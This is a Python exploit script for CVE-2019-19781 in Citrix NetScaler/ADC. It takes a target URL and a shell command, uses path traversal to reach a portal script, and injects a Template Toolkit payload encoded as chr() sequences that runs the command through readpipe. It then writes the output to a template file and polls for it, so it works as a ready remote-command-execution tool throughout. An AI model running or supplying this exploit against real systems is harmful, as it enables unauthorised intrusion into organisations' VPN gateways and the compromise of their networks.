CVE-2019-19781.py

import sys
import random
import string
import requests
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

debug=False
# Todo
# - continues mode -c
# loop, ask command, execute, show response, and add ./ to ROUTE . UNTIL CTRL+C
# - check mode
# Get /vpn/../vpns/cfg/smb.conf

#url attack
url = sys.argv[1]

# Command to execute
command=sys.argv[2]

# Id exploit
name_id = ''.join([random.choice(string.ascii_letters
                + string.digits) for n in  range(12)])
# Folder exploit
route = "/vpn/../vpns/portal/scripts/newbm.pl"

# Add all output to a file to request after execution
command+=" 2>&1 | tee /netscaler/portal/templates/"+name_id+".xml"

# Creating the payload
exploit="[% template.new({'BLOCK'='print readpipe("

for c in command[:-1]:
    exploit+="chr(" +str(ord(c))+")."

exploit+="chr(" +str(ord(command[-1]))+")"
exploit+=")'})%]"

if debug:
    print(exploit)
    print(name_id)
    print(url)
    print(route)

# request exec code
request=True
burp0_headers = { "Accept": "*/*",
    "NSC_USER": "/../../../../../../../../../../netscaler/portal/templates/" + name_id,
    "NSC_NONCE": name_id, "Content-type": "application/x-www-form-urlencoded",
    "Connection": "close"}
burp0_data = {"url": "http://example.com\\", "title": exploit, "desc": "test\\", "UI_inuse": "RfWeb"}
# While Age in response (cache)
while request :
    burp0_url = url+route
    response=requests.post(burp0_url, headers=burp0_headers, data=burp0_data,verify=False)

    if response.headers.get('Age') is not None :
        if debug:
            print("repeat")
            print(route)
        route=route.replace("../", ".././")
    else:
        request=False

# request response, while not 200 OK
request=True
while request:
    burp0_url = url+"/vpn/../././vpns/portal/"+name_id+".xml"
    burp0_headers = {"User-Agent": "curl/7.66.0", "Accept": "*/*", "NSC_NONCE": "uprbKq22", "NSC_USER": "uprbKq22", "Connection": "close"}
    response=requests.get(burp0_url, headers=burp0_headers, verify=False)

    if response.status_code == 200:
        request=False
    else:
        time.sleep(2)

if debug:
    print(response.text)

#remove error in perl in response
sep = 'u'
rest = response.text.split(sep, 1)[0]

print(rest)